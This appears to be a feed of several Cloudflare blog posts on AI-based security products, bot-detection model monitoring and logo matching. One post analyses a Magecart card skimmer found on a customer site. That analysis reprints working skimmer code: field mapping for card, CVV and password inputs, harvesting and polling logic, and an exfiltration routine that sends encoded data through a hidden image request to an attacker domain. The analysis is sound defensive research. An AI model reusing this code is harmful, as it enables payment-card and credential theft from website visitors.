We are witnessing phishing attacks and social engineering becoming more sophisticated as attackers tap into powerful new tools to generate credible content or interact with humans as if it was a real person. Attackers can use AI to build boutique tooling made for attacking specific sites with the intent of harvesting proprietary data and taking over user accounts.
To protect against these new challenges, we need new and more sophisticated security tools: this is how Defensive AI was born. Defensive AI is the framework Cloudflare uses when thinking about how intelligent systems can improve the effectiveness of our security solutions. The key to Defensive AI is data generated by Cloudflare’s vast network, whether generally across our entire network or specific to individual customer traffic.
At Cloudflare, we use AI to increase the level of protection across all security areas, ranging from application security to email security and our Zero Trust platform. This includes creating customized protection for every customer for API or email security, or using our huge amount of attack data to train models to detect application attacks that haven’t been discovered yet.
In the following sections, we will provide examples of how we designed the latest generation of security products that leverage AI to secure against AI-powered attacks.
    
      Protecting APIs with anomaly detection
      
        
      
    
    APIs power the modern Web, comprising 57% of dynamic traffic across the Cloudflare network, up from 52% in 2021. While APIs aren’t a new technology, securing them differs from securing a traditional web application. Because APIs offer easy programmatic access by design and are growing in popularity, fraudsters and threat actors have pivoted to targeting APIs. Security teams must now counter this rising threat. Importantly, each API is usually unique in its purpose and usage, and therefore securing APIs can take an inordinate amount of time.
            
            
            
            
            
Cloudflare is announcing the development of API Anomaly Detection for API Gateway to protect APIs from attacks designed to damage applications, take over accounts, or exfiltrate data. API Gateway provides a layer of protection between your hosted APIs and every device that interfaces with them, giving you the visibility, control, and security tools you need to manage your APIs.
API Anomaly Detection is an upcoming, ML-powered feature in our API Gateway product suite and a natural successor to Sequence Analytics. In order to protect APIs at scale, API Anomaly Detection learns an application’s business logic by analyzing client API request sequences. It then builds a model of what a sequence of expected requests looks like for that application. The resulting traffic model is used to identify attacks that deviate from the expected client behavior. As a result, API Gateway can use its Sequence Mitigation functionality to enforce the learned model of the application’s intended business logic, stopping attacks.
            
            
            
            
            
While we’re still developing API Anomaly Detection, API Gateway customers can sign up here to be included in the beta for API Anomaly Detection. Today, customers can get started with Sequence Analytics and Sequence Mitigation by reviewing the docs. Enterprise customers that haven’t purchased API Gateway can self-start a trial in the Cloudflare Dashboard, or contact their account manager for more information.
    
      Identifying unknown application vulnerabilities
      
        
      
    
    Another area where AI improves security is in our Web Application Firewall (WAF). Cloudflare processes 55 million HTTP requests per second on average and has an unparalleled visibility into attacks and exploits across the world targeting a wide range of applications.
            
            
            
            
            
One of the big challenges with the WAF is adding protections for new vulnerabilities and false positives. A WAF is a collection of rules designed to identify attacks directed at web applications. New vulnerabilities are discovered daily and at Cloudflare we have a team of security analysts that create new rules when vulnerabilities are discovered. However, manually creating rules takes time — usually hours — leaving applications potentially vulnerable until a protection is in place. The other problem is that attackers continuously evolve and mutate existing attack payloads that can potentially bypass existing rules.
This is why Cloudflare has, for years, leveraged machine learning models that constantly learn from the latest attacks, deploying mitigations without the need for manual rule creation. This can be seen, for example, in our WAF Attack Score solution. WAF Attack Score is based on an ML model trained on attack traffic identified on the Cloudflare network. The resulting classifier allows us to identify variations and bypasses of existing attacks as well as extending the protection to new and undiscovered attacks. Recently, we have made Attack Score available to all Enterprise and Business plans.
            
            
            
            
            
Attack Score uses AI to classify each HTTP request based on the likelihood that it’s malicious
While the contribution of security analysts is indispensable, in the era of AI and rapidly evolving attack payloads, a robust security posture demands solutions that do not rely on human operators to write rules for each novel threat. Combining Attack Score with traditional signature-based rules is an example of how intelligent systems can support tasks carried out by humans. Attack Score identifies new malicious payloads which can be used by analysts to optimize rules that, in turn, provide better training data for our AI models. This creates a reinforcing positive feedback loop improving the overall protection and response time of our WAF.
Long term, we will adapt the AI model to account for customer-specific traffic characteristics to better identify deviations from normal and benign traffic.
    
      Using AI to fight phishing
      
        
      
    
    Email is one of the most effective vectors leveraged by bad actors with the US Cybersecurity and Infrastructure Security Agency (CISA) reporting that 90% of cyber attacks start with phishing and Cloudflare Email Security marking 2.6% of 2023's emails as malicious. The rise of AI-enhanced attacks are making traditional email security providers obsolete, as threat actors can now craft phishing emails that are more credible than ever with little to no language errors.
            
            
            
            
            
Cloudflare Email Security is a cloud-native service that stops phishing attacks across all threat vectors. Cloudflare’s email security product continues to protect customers with its AI models, even as trends like Generative AI continue to evolve. Cloudflare’s models analyze all parts of a phishing attack to determine the risk posed to the end user. Some of our AI models are personalized for each customer while others are trained holistically. Privacy is paramount at Cloudflare, so only non-personally identifiable information is used by our tools for training. In 2023, Cloudflare processed approximately 13 billion, and blocked 3.4 billion, emails, providing the email security product a rich dataset that can be used to train AI models.
Two detections that are part of our portfolio are Honeycomb and Labyrinth.
Honeycomb is a patented email sender domain reputation model. This service builds a graph of who is sending messages and builds a model to determine risk. Models are trained on specific customer traffic patterns, so every customer has AI models trained on what their good traffic looks like.
Labyrinth uses ML to protect on a per-customer basis. Actors attempt to spoof emails from our clients’ valid partner companies.  We can gather a list with statistics of known & good email senders for each of our clients. We can then detect the spoof attempts when the email is sent by someone from an unverified domain, but the domain mentioned in the email itself is a reference/verified domain.
AI remains at the core of our email security product, and we are constantly improving the ways we leverage it within our product. If you want to get more information about how we are using our AI models to stop AI enhanced phishing attacks check out our blog post here.
    
      Zero-Trust security protected and powered by AI
      
        
      
    
    Cloudflare Zero Trust provides administrators the tools to protect access to their IT infrastructure by enforcing strict identity verification for every person and device regardless of whether they are sitting within or outside the network perimeter.
            
            
            
            
            
One of the big challenges is to enforce strict access control while reducing the friction introduced by frequent verifications. Existing solutions also put pressure on IT teams that need to analyze log data to track how risk is evolving within their infrastructure. Sifting through a huge amount of data to find rare attacks requires large teams and substantial budgets.
Cloudflare simplifies this process by introducing behavior-based user risk scoring. Leveraging AI, we analyze real-time data to identify anomalies in the users’ behavior and signals that could lead to harms to the organization. This provides administrators with recommendations on how to tailor the security posture based on user behavior.
Zero Trust user risk scoring detects user activity and behaviors that could introduce risk to your organizations, systems, and data and assigns a score of Low, Medium, or High to the user involved. This approach is sometimes referred to as user and entity behavior analytics (UEBA) and enables teams to detect and remediate possible account compromise, company policy violations, and other risky activity.
The first contextual behavior we are launching is “impossible travel”, which helps identify if a user’s credentials are being used in two locations that the user could not have traveled to in that period of time. These risk scores can be further extended in the future to highlight personalized behavior risks based on contextual information such as time of day usage patterns and access patterns to flag any anomalous behavior. Since all traffic would be proxying through your SWG, this can also be extended to resources which are being accessed, like an internal company repo.
We have an exciting launch during security week. Check out this blog to learn more.
    
      Conclusion
      
        
      
    
    From application and email security to network security and Zero Trust, we are witnessing attackers leveraging new technologies to be more effective in achieving their goals. In the last few years, multiple Cloudflare product and engineering teams have adopted intelligent systems to better identify abuses and increase protection.
Besides the generative AI craze, AI is already a crucial part of how we defend digital assets against attacks and how we discourage bad actors. 


Navigating the maze of Magecart: a cautionary tale of a Magecart impacted website
Himanshu Anand — Mon, 04 Mar 2024 14:00:21 GMT
 
The Cloudflare security research team reviews and evaluates scripts flagged by Cloudflare Page Shield, focusing particularly on those with low scores according to our machine learning (ML) model, as low scores indicate the model thinks they are malicious. It was during one of these routine reviews that we stumbled upon a peculiar script on a customer’s website, one that was being fetched from a zone unfamiliar to us, a new and uncharted territory in our digital map.
This script was not only obfuscated but exhibited some suspicious behavior, setting off alarm bells within our team. Its complexity and the mysterious nature piqued our curiosity, and we decided to delve deeper, to unravel the enigma of what this script was truly up to.
In our quest to decipher the script's purpose, we geared up to dissect its layers, determined to shed light on its hidden intentions and understand the full scope of its actions.
The Infection Mechanism: A seemingly harmless HTML div element housed a piece of JavaScript, a trojan horse lying in wait.
            


            The script was the conduit for the malicious activities
    
      The devil in the details
      
        
      
    
    The script hosted at the aforementioned domain was a piece of obfuscated JavaScript, a common tactic used by attackers to hide their malicious intent from casual observation. The obfuscated code can be examined in detail through the snapshot provided by Cloudflare Radar URL Scanner.
Obfuscated script snippet:
            function _0x5383(_0x411252,_0x2f6ba1){var _0x1d211f=_0x1d21();return _0x5383=function(_0x5383da,_0x5719da){_0x5383da=_0x5383da-0x101;var _0x3d97e9=_0x1d211f[_0x5383da];return _0x3d97e9;},_0x5383(_0x411252,_0x2f6ba1);}var _0x11e3ed=_0x5383;(function(_0x3920b4,_0x32875c){var _0x3147a9=_0x5383,_0x5c373e=_0x3920b4();while(!![]){try{var _0x5e0fb6=-parseInt(_0x3147a9(0x13e))/0x1*(parseInt(_0x3147a9(0x151))/0x2)+parseInt(_0x3147a9(0x168))/0x3*(parseInt(_0x3147a9(0x136))/0x4)+parseInt(_0x3147a9(0x15d))/0x5*(parseInt(_0x3147a9(0x152))/0x6)+-parseInt(_0x3147a9(0x169))/0x7*(-parseInt(_0x3147a9(0x142))/0x8)+parseInt(_0x3147a9(0x143))/0x9+-parseInt(_0x3147a9(0x14b))/0xa+-parseInt(_0x3147a9(0x150))/0xb;if(_0x5e0fb6===_0x32875c)break;else _0x5c373e['push'](_0x5c373e['shift']());}catch(_0x1f0719){_0x5c373e['push'](_0x5c373e['shift']());}}}(_0x1d21,0xbc05c));function _0x1d21(){var _0x443323=['3439548foOmOf',
.....
            The primary objective of this script was to steal Personally Identifiable Information (PII), including credit card details. The stolen data was then transmitted to a server controlled by the attackers, located at https://jsdelivr\[.\]at/f\[.\]php.
    
      Decoding the malicious domain
      
        
      
    
    Before diving deeper into the exact behaviors of a script, examining the hosted domain and its insights could already reveal valuable arguments for overall evaluation. Regarding the hosted domain cdn.jsdelivr.at used in this script:
It was registered on 2022-04-14.
It impersonates the well-known hosting service jsDelivr, which is hosted at cdn.jsdelivr.net.
It was registered by 1337team Limited, a company known for providing bulletproof hosting services. These services are frequently utilized in various cybercrime campaigns due to their resilience against law enforcement actions and their ability to host illicit activities without interruption.
Previous mentions of this hosting provider, such as in a tweet by @malwrhunterteam, highlight its involvement in cybercrime activities. This further emphasizes the reputation of 1337team Limited in the cybercriminal community and its role in facilitating malicious campaigns.
    
      Decoding the malicious script
      
        
      
    
    Data Encoding and Decoding Functions: The script uses two functions, wvnso.jzzys and wvnso.cvdqe, for encoding and decoding data. They employ Base64 and URL encoding techniques, common methods in malware to conceal the real nature of the data being sent.
            var wvnso = {
  "jzzys": function (_0x5f38f3) {
    return btoa(encodeURIComponent(_0x5f38f3).replace(/%([0-9A-F]{2})/g, function (_0x7e416, _0x1cf8ee) {
      return String.fromCharCode('0x' + _0x1cf8ee);
    }));
  },
  "cvdqe": function (_0x4fdcee) {
    return decodeURIComponent(Array.prototype.map.call(atob(_0x4fdcee), function (_0x273fb1) {
      return '%' + ('00' + _0x273fb1.charCodeAt(0x0).toString(0x10)).slice(-0x2);
    }).join(''));
  }
            Targeted Data Fields: The script is designed to identify and monitor specific input fields on the website. These fields include sensitive information like credit card numbers, names, email addresses, and other personal details. The wvnso.cwwez function maps these fields, showing that the attackers had carefully studied the website’s layout.
            "cwwez": window.JSON.parse(wvnso.cvdqe("W1siZmllbGQiLCAiaWZyYW1lIiwgMCwgIm4iLCAiTnVtYmVyIl0sIFsibmFtZSIsICJmaXJzdG5hbWUiLCAwLCAiZiIsICJIb2xkZXIiXSwgWyJuYW1lIiwgImxhc3RuYW1lIiwgMCwgImwiLCAiSG9sZGVyIl0sIFsiZmllbGQiLCAiaWZyYW1lIiwgMCwgImUiLCAiRGF0ZSJdLCBbImZpZWxkIiwgImlmcmFtZSIsIDAsICJjIiwgIkNWViJdLCBbImlkIiwgImN1c3RvbWVyLWVtYWlsIiwgMCwgImVsIiwgImVtYWlsIl0sIFsibmFtZSIsICJ0ZWxlcGhvbmUiLCAwLCAicGUiLCAicGhvbmUiXSwgWyJuYW1lIiwgImNpdHkiLCAwLCAiY3kiLCAiY2l0eSJdLCBbIm5hbWUiLCAicmVnaW9uX2lkIiwgMywgInNlIiwgInN0YXRlIl0sIFsibmFtZSIsICJyZWdpb24iLCAwLCAic2UiLCAic3RhdGUiXSwgWyJuYW1lIiwgImNvdW50cnlfaWQiLCAwLCAiY3QiLCAiQ291bnRyeSJdLCBbIm5hbWUiLCAicG9zdGNvZGUiLCAwLCAienAiLCAiWmlwIl0sIFsiaWQiLCAiY3VzdG9tZXItcGFzc3dvcmQiLCAwLCAicGQiLCAicGFzc3dvcmQiXSwgWyJuYW1lIiwgWyJzdHJlZXRbMF0iLCAic3RyZWV0WzFdIiwgInN0cmVldFsyXSJdLCAwLCAiYXMiLCAiYWRkciJdXQ==")),
            Data Harvesting Logic: The script uses a set of complex functions ( wvnso.uvesz,  wvnso.wsrmf, etc.) to check each targeted field for user input. When it finds the data it wants (like credit card details), it collects ("harvests") this data and gets it ready to be sent out ("exfiltrated").
            "uvesz": function (_0x52b255) {
    for (var _0x356fbe = 0x0; _0x356fbe < wvnso.cwwez.length; _0x356fbe++) {
      var _0x25348a = wvnso.cwwez[_0x356fbe];
      if (_0x52b255.hasAttribute(_0x25348a[0x0])) {
        if (typeof _0x25348a[0x1] == "object") {
          var _0xca9068 = '';
          _0x25348a[0x1].forEach(function (_0x450919) {
            var _0x907175 = document.querySelector('[' + _0x25348a[0x0] + "=\"" + _0x450919 + "\"" + ']');
            if (_0x907175 != null && wvnso.wsrmf(_0x907175, _0x25348a[0x2]).length > 0x0) {
              _0xca9068 += wvnso.wsrmf(_0x907175, _0x25348a[0x2]) + " ";
            }
          });
          wvnso.krwon[_0x25348a[0x4]] = _0xca9068.trim();
        } else {
          if (_0x52b255.attributes[_0x25348a[0x0]].value == _0x25348a[0x1] && wvnso.wsrmf(_0x52b255, _0x25348a[0x2]).length > 0x0) {
            if (_0x25348a[0x3] == 'l') {
              wvnso.krwon[_0x25348a[0x4]] += " " + wvnso.wsrmf(_0x52b255, _0x25348a[0x2]);
            } else {
              if (_0x25348a[0x3] == 'y') {
                wvnso.krwon[_0x25348a[0x4]] += '/' + wvnso.wsrmf(_0x52b255, _0x25348a[0x2]);
              } else {
                wvnso.krwon[_0x25348a[0x4]] = wvnso.wsrmf(_0x52b255, _0x25348a[0x2]);
              }
            }
          }
        }
      }
    }
  }
            Stealthy Data Exfiltration: After harvesting the data, the script sends it secretly to the attacker's server (located at https://jsdelivr\[.\]at/f\[.\]php). This process is done in a way that mimics normal Internet traffic, making it hard to detect. It creates an Image HTML element programmatically (not displayed to the user) and sets its src attribute to a specific URL. This URL is the attacker's server where the stolen data is sent.
            "eubtc": function () {
    var _0x4b786d = wvnso.jzzys(window.JSON.stringify(wvnso.krwon));
    if (wvnso.pqemy() && !(wvnso.rnhok.indexOf(_0x4b786d) != -0x1)) {
      wvnso.rnhok.push(_0x4b786d);
      var _0x49c81a = wvnso.spyed.createElement("IMG");
      _0x49c81a.src = wvnso.cvdqe("aHR0cHM6Ly9qc2RlbGl2ci5hdC9mLnBocA==") + '?hash=' + _0x4b786d;
    }
  }
            Persistent Monitoring: The script keeps a constant watch on user input. This means that any data entered into the targeted fields is captured, not just when the page first loads, but continuously as long as the user is on the page.
Execution Interval: The script is set to activate its data-collecting actions at regular intervals, as shown by the window.setInterval(wvnso.bumdr, 0x1f4) function call. This ensures that it constantly checks for new user input on the site.
            window.setInterval(wvnso.bumdr, 0x1f4);
            Local Data Storage: Interestingly, the script uses local storage methods (wvnso.hajfd, wvnso.ijltb) to keep the collected data on the user's device. This could be a way to prevent data loss in case there are issues with the Internet connection or to gather more data before sending it to the server.
            "ijltb": function () {
    var _0x19c563 = wvnso.jzzys(window.JSON.stringify(wvnso.krwon));
    window.localStorage.setItem("oybwd", _0x19c563);
  },
  "hajfd": function () {
    var _0x1318e0 = window.localStorage.getItem("oybwd");
    if (_0x1318e0 !== null) {
      wvnso.krwon = window.JSON.parse(wvnso.cvdqe(_0x1318e0));
    }
  }
            This JavaScript code is a sophisticated tool for stealing sensitive information from users. It's well-crafted to avoid detection, gather detailed information, and transmit it discreetly to a remote server controlled by the attackers.
    
      Proactive detection
      
        
      
    
    Page Shield's existing machine learning algorithm is capable of automatically detecting malicious JavaScript code. As cybercriminals evolve their attack methods, we are constantly improving our detection and defense mechanisms. An upcoming version of our ML model, an artificial neural network, has been designed to maintain high recall (i.e., identifying the many different types of malicious scripts) while also providing a low false positive rate (i.e., reducing false alerts for benign code). The new version of Page Shield's ML automatically flagged the above script as a Magecart type attack with a very high probability. In other words, our ML correctly identified a novel attack script operating in the wild! Cloudflare customers with Page Shield enabled will soon be able to take further advantage of our latest ML's superior protection for client-side security. Stay tuned for more details.
    
      What you can do
      
        
      
    
    The attack on a Cloudflare customer is a sobering example of the Magecart threat. It underscores the need for constant vigilance and robust client-side security measures for websites, especially those handling sensitive user data. This incident is a reminder that cybersecurity is not just about protecting data but also about safeguarding the trust and well-being of users.
We recommend the following actions to enhance security and protect against similar threats. Our comprehensive security model includes several products specifically designed to safeguard web applications and sensitive data:
Implement WAF Managed Rule Product: This solution offers robust protection against known attacks by monitoring and filtering HTTP traffic between a web application and the Internet. It effectively guards against common web exploits.
Deploy ML-Based WAF Attack Score: Our ML-based WAF, known as Attack Score, is specifically engineered to defend against previously unknown attacks. It uses advanced machine learning algorithms to analyze web traffic patterns and identify potential threats, providing an additional layer of security against sophisticated and emerging threats.
Use Page Shield: Page Shield is designed to protect against Magecart-style attacks and browser supply chain threats. It monitors and secures third-party scripts running on your website, helping you identify malicious activity and proactively prevent client-side attacks, such as theft of sensitive customer data. This tool is crucial for preventing data breaches originating from compromised third-party vendors or scripts running in the browser.
Activate Sensitive Data Detection (SDD): SDD alerts you if certain sensitive data is being exfiltrated from your website, whether due to an attack or a configuration error. This feature is essential for maintaining compliance with data protection regulations and for promptly addressing any unauthorized data leakage.
....
¹
[1]: https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore
[2]: https://www.bizcommunity.com/Article/196/661/241908.html
[3]: https://nationaldailyng.com/trend-micro-teams-up-with-interpol-to-fight-african-cybercrime-networks/ 


Monitoring machine learning models for bot detection
Daniel Means — Fri, 16 Feb 2024 14:00:05 GMT
 
            
            
            
            
            
Cloudflare’s Bot Management is used by organizations around the world to proactively detect and mitigate automated bot traffic. To do this, Cloudflare leverages machine learning models that help predict whether a particular HTTP request is coming from a bot or not, and further distinguishes between benign and malicious bots. Cloudflare serves over 55 million HTTP requests per second — so our machine learning models need to run at Cloudflare scale.
We are constantly making improvements to the models that power Bot Management to ensure they are incorporating the latest threat intelligence. This process of iteration is an important part of ensuring our customers stay a step ahead of malicious actors, and it requires a rigorous process for experimentation, deployment, and ongoing observation.
We recently shared an introduction to Cloudflare’s approach to MLOps, which provides a holistic overview of model training and deployment processes at Cloudflare. In this post, we will dig deeper into monitoring, and how we continuously evaluate the models that power Bot Management.
    
      Why monitoring matters
      
        
      
    
    Before bot detection models are released, we undergo an extensive model testing/validation process to ensure our detections perform as expected. Model performance is validated across a wide number of web traffic segments, by browser, HTTP protocol, and other dimensions to get a fine-grained view into how we expect the model to perform once deployed. If everything checks out, the model is gradually released into production, and we get a level up in our bot detections.
After models are deployed to production, it can be challenging to get visibility into performance on a granular level. Sure, we can look at outcomes-based metrics — like bot score distributions, or challenge solve rates. These are informative, but with any change in bot scoring or challenge solve rates, we're still left asking, "Which segments of web traffic are most impacted by this change? Was that expected?".
To train a model for the Internet is to train a model against a moving target. Anyone can train a model on static data and achieve great results — so long as the input does not change. Building a model that generalizes into the future, with new threats, browsers, and bots is a more difficult task. Machine learning monitoring is an important part of the story because it provides confidence that our models continue to generalize, using a rigorous and repeatable process.
In the days before machine learning monitoring, the team would analyze web traffic patterns and model scoring results to track the proportion of web requests scored as bot or human. This high-level metric is helpful for evaluating performance of the model in the aggregate, but didn’t provide granular detail into how the model was behaving with particular types of traffic. For a deeper analysis, we’d be left with the additional work of investigating performance on individual traffic segments like traffic from Chrome browser or clients using iOS.
With machine learning monitoring, we get insights into how the model behaves not just at a high level, but in a much more granular way — without having to do a lot of manual investigation. The monitoring closes the feedback loop by answering the critical question: "How are our bot detection models performing in production?" Monitoring gives us the same level of confidence derived from pre-deployment model validation/testing, except applied to all models in production.
The use cases for which monitoring has proven invaluable include:
Investigating bot score anomalies: If a customer reports machine learning scoring false positives/negatives, and we suspect broader issues across a subset of detections, monitoring can help zero-in on the answer. Engineers can find insights from our global monitoring dashboard, or focus on performance for a specific dataset.
Monitoring any model predictions or request field: The monitoring service is flexible and can add an observability layer over any request artifact stored in our web requests databases. If model predictions or outcomes of interest are stored with our request logs, then they can be monitored. We can work across engineering teams to enable monitoring for any outcome.
Deploying new models: We gradually deploy new model versions, eventually ramping up to running across Cloudflare’s global web traffic. Along the way, we have a series of checks before a new model can be deployed to the next release step. Monitoring allows us to compare the latest model with the previous version against granular traffic segments at each deployment stage — giving us confidence when proceeding forward with the rollout.
    
      How does machine learning monitoring work?
      
        
      
    
    The process begins with a ground-truth dataset — a set of traffic data known to be either human or bot-generated, labeled accordingly and accurately. If our model identifies a particular request as bot traffic, when our ground-truth label indicates it originated from a human, then we know the model has miscategorized the request, and vice versa. This kind of labeled data, where we flag traffic as being from a bot or a human, is what our model is trained on to learn to make detections in the first place.
Datasets gathered at training time allow us to evaluate the performance of a trained model for that snapshot in time. Since we want to continuously evaluate model performance in production, we need to likewise get real-time labeled data to compare against our bot score. We can generate a labeled dataset for this purpose when we’re certain that web requests come from a certain actor. For example, our heuristics engine is one source of high-confidence labeled data. Other sources of reliable, labeled data include customer feedback and attack pattern research.
We can directly compare our model’s bot scores on web requests against recently-labeled datasets to judge model performance. To ensure that we are making an apples-to-apples comparison as we evaluate the model’s score over time, consistency is paramount: the data itself will be different, but we want the methodology, conditions, and filters to remain the same between sampling windows. We have automated this process, allowing us to generate labeled datasets in real-time that give us an up-to-the-minute view of model performance.
    
      Getting granular performance metrics
      
        
      
    
    Let's say we detect a sudden drop in accuracy on a given dataset labeled as bot traffic, meaning our detection is incorrectly scoring bots as human traffic. We would be keen to determine the exact subset of traffic responsible for the scoring miss. Is it coming from the latest Chrome browser or maybe a certain ASN?
To answer this, performance monitoring uses specializations, which are filters applied against our dataset that focus on a dimension of interest (e.g. browser type, ASN). With specializations on datasets, we get both an expectation on how traffic should  have been scored, and insight into the exact dimension causing the miss.
    
      Integrating monitoring into our bots machine learning platform
      
        
      
    
    The monitoring system runs on a unified platform called Endeavor, which we built to handle all aspects of bots-related machine learning, including model training and validation, model interpretability, and delivering the most up-to-date information to our servers running bot detection. We can break down monitoring into a few tasks: rendering monitoring queries to fetch datasets, computing performance metrics, and storing metrics. Endeavour uses Airflow, a workflow execution engine, making it a great place to run our monitoring tasks on top of a kubernetes cluster and GPUs, with access to Postgres and ClickHouse databases.
            
            
            
            
            
    
      Rendering monitoring queries
      
        
      
    
    A monitoring query is simply a SQL query to our ClickHouse web request database asking "How does machine learning scoring look right now?". The query gets more precise when we add in dataset and specialization conditions so that we can ask a more refined question "For this set of known (non-)automated traffic, how does machine learning scoring look along these dimensions of interest?".
In our system, datasets for training and validation are determined using SQL queries, which are tailored to capture segments of request traffic, such as traffic flagged as bots by our heuristics engine. For model monitoring, we adapt these queries to measure performance metrics like accuracy and continuously update the time range to measure the latest model performance. For each dataset used in training and validation, we can generate a monitoring query that produces real-time insight into model performance.
    
      Computing performance metrics
      
        
      
    
    With a rendered monitoring query ready, we can go ahead and fetch bot score distributions from our web request database. The MetricsComputer takes in the bot score distributions as input and produces relevant performance metrics, like accuracy, over a configurable time interval.
We can evaluate model performance along any metric of interest. The MetricInterface is a Python interface that acts as a blueprint for performance metrics. Any newly added metric would only need to implement the interface's compute_metric method, which defines how the MetricsComputer should perform the calculation.
    
      Storing metrics
      
        
      
    
    After each monitoring run, we store performance metrics by dataset, model version, and specialization value in the ml_performance ClickHouse table. Precomputing metrics enables long data retention periods, so we can review model performance by model versions or dimensions of interest over time. Importantly, newly added performance metrics can be backfilled as needed since the ml_performance table also stores the score distributions used to compute each metric.
    
      Running tasks on GPUs
      
        
      
    
    Metrics computation is load balanced across endeavour-worker instances running across GPUs. From a system perspective, the airflow-scheduler adds a monitoring task to a Redis Queue and Airflow Celery workers running on each GPU will pull tasks off the queue for processing. We benefit from having a production service constantly powered by GPUs, as opposed to only running ad hoc model training workloads. As a result, the monitoring service acts as a health-check that ensures various Endeavour components are functioning properly on GPUs. This helps ensure the GPUs are always updated and ready to run model training/validation tasks.
    
      Machine learning monitoring in action
      
        
      
    
    To better illustrate how Cloudflare uses machine learning monitoring, let’s explore some recent examples.
    
      Improving accuracy of machine learning bot detection
      
        
      
    
    
            
            
            
            
            
When the monitoring system was first deployed, we quickly found an anomaly: our model wasn’t performing well on web traffic using HTTP/3. At the time, HTTP/3 usage was hardly seen across the web, and the primary model in production wasn’t trained on HTTP/3 traffic, leading to inaccurate bot scores. Fortunately, another bot detection layer, our heuristics engine, was still accurately finding bots using HTTP/3 — so our customers were still covered.
Still, this finding pointed to a key area of improvement for the next model iteration. And we did improve: the next model iteration was consistently able to distinguish between bot and human initiated HTTP/3 web requests with over 3.5x higher accuracy compared to the prior model version. As we enable more datasets and specializations, we can uncover specific browsers, OSs and other dimensions where performance can be improved during model training.
    
      Early detection, quick intervention
      
        
      
    
    Deploying machine learning at a global scale, running in data centers spread over 100 countries around the world, is challenging. Things don’t always go to plan.
A couple of years ago, we deployed an update to our machine learning powered bot detections, and it led to an increase in false positive bot detections — we were incorrectly flagging some legitimate traffic as bot traffic. Our monitoring system quickly showed a drop in performance on residential ASNs where we expect mostly non-automated traffic.
            
            
            
            
            
In the graph above, deployments are shown to three colo “tiers”, 1-3. Since software deployments start on tier 3 colocation centers and gradually move up to tier 1, the impact followed the same pattern.
At the same time, a software release was being deployed to our global network, but we didn’t know if it was the cause of the performance drop. We do staged deployments, updating the software in one batch of datacenters at a time before reaching global traffic. Our monitoring dashboards showed a drop in performance that followed this exact deployment pattern, and the release was starting to reach our biggest datacenters.
Monitoring dashboards clearly showed the pattern followed a software update. We reverted the change before the update made it to most of our datacenters and restored normal machine learning bot detection performance. Monitoring allows us to catch performance anomalies, dig into the root cause, and take action — fast.
    
      Model deployment monitoring for all
      
        
      
    
    We’ve seen a lot of value in being able to monitor and control our models and deployments, and realized that other people must be running into the same challenges as well. Over the next few months, we'll be building out more advanced features for AI Gateway – our proxy that helps people observe and control their AI applications and models better. With AI Gateway, we can do all the same deployments, monitoring, and optimization strategies we have been doing for our Bot detection models in one unified control plane. We're excited to use these new features internally, but even more excited to release these features to the public, so that anyone is able to deploy, test, monitor and improve the way they use AI or machine learning models.
    
      Next up
      
        
      
    
    Today, machine learning monitoring helps us investigate performance issues and monitor performance as we roll out new models — and we're just getting started!
This year, we're accelerating our machine learning model iterations for bot detection to deliver improved detections faster than ever. Monitoring will be key for enabling fast and safe deployments. We’re excited to add alerting based on model performance - so that we’re automatically notified should model performance ever drift outside our expected bounds.
Alongside our Workers AI launch, we recently deployed GPUs in 100+ cities, leveling up our compute resources at a global scale. This new infrastructure will unlock our model iteration process, allowing us to explore new, cutting-edge models with even more powerful bot detection capabilities. Running models on our GPUs will bring inference closer to users for better model performance and latency, and we’re excited to leverage our new GPU compute with our bot detection models as well. 


Safeguarding your brand identity: Logo Matching for Brand Protection
Alexandra Moraru — Thu, 15 Feb 2024 14:00:34 GMT
 
In an era dominated by digital landscapes, protecting your brand’s identity has become more challenging than ever. Malicious actors regularly build lookalike websites, complete with official logos and spoofed domains, to try to dupe customers and employees. These kinds of phishing attacks can damage your reputation, erode customer trust, or even result in data breaches.
In March 2023 we introduced Cloudflare’s Brand and Phishing Protection suite, beginning with Brand Domain Name Alerts. This tool recognizes so-called “confusable” domains (which can be nearly indistinguishable from their authentic counterparts) by sifting through the trillions of DNS requests passing through Cloudflare’s DNS resolver, 1.1.1.1. This helps brands and organizations stay ahead of malicious actors by spotting suspicious domains as soon as they appear in the wild.
Today we are excited to expand our Brand Protection toolkit with the addition of Logo Matching. Logo Matching is a powerful tool that allows brands to detect unauthorized logo usage: if Cloudflare detects your logo on an unauthorized site, you receive an immediate notification.
The new Logo Matching feature is a direct result of a frequent request from our users. Phishing websites often use official brand logos as part of their facade. In fact, the appearance of unauthorized logos is a strong signal that a hitherto dormant suspicious domain is being weaponized. Being able to identify these sites before they are widely distributed is a powerful tool in defending against phishing attacks. Organizations can use Cloudflare Gateway to block employees from connecting to sites with a suspicious domain and unauthorized logo use.
Imagine having the power to fortify your brand's presence and reputation. By detecting instances where your logo is being exploited, you gain the upper hand in protecting your brand from potential fraud and phishing attacks.
    
      Getting started with Logo Matching
      
        
      
    
    For most brands, the first step to leveraging Logo Matching will be to configure Domain Name Alerts. For example, we might decide to set up an alert for example.com, which will use fuzzy matching to detect lookalike, high-risk domain names. All sites that trigger an alert are automatically analyzed by Cloudflare’s phishing scanner, which gathers technical information about each site, including SSL certificate data, HTTP request and response data, page performance data, DNS records, and more — all of which inform a machine-learning based phishing risk analysis.
Logo Matching further extends this scan by looking for matching images. The system leverages image recognition algorithms to crawl through scanned domains, identifying matches even when images have undergone slight modifications or alterations.
Once configured, Domain Name Alerts and the scans they trigger will continue on an ongoing basis. In addition, Logo Matching monitors for images across all domains scanned by Cloudflare’s phishing scanner, including those scanned by other Brand Protection users, as well as scans initiated via the Cloudflare Radar URL scanner, and the Investigate Portal within Cloudflare’s Security Center dashboard.
            
            
            
            
            
    
      How we built Logo Matching for Brand Protection
      
        
      
    
    
    
      Under the hood of our API Insights
      
        
      
    
    Now, let's dive deeper into the engine powering this feature – our Brand Protection API. This API serves as the backbone of the entire process. Not only does it enable users to submit logos and brand images for scanning, but it also orchestrates the complex matching process.
When a logo is submitted through the API, the Logo Matching feature not only identifies potential matches but also allows customers to save a query, providing an easy way to refer back to their queries and see the most recent results. If a customer chooses to save a query, the logo is swiftly added to our data storage in R2, Cloudflare’s zero egress fee object storage. This foundational feature enables us to continuously provide updated results without the customer having to create a new query for the same logo.
            
            
            
            
            
The API ensures real-time responses for logo submissions, simultaneously kick-starting our internal scanning pipelines. An image look-back ID is generated to facilitate seamless tracking and processing of logo submissions. This identifier allows us to keep a record of the submitted images, ensuring that we can efficiently manage and process them through our system.
    
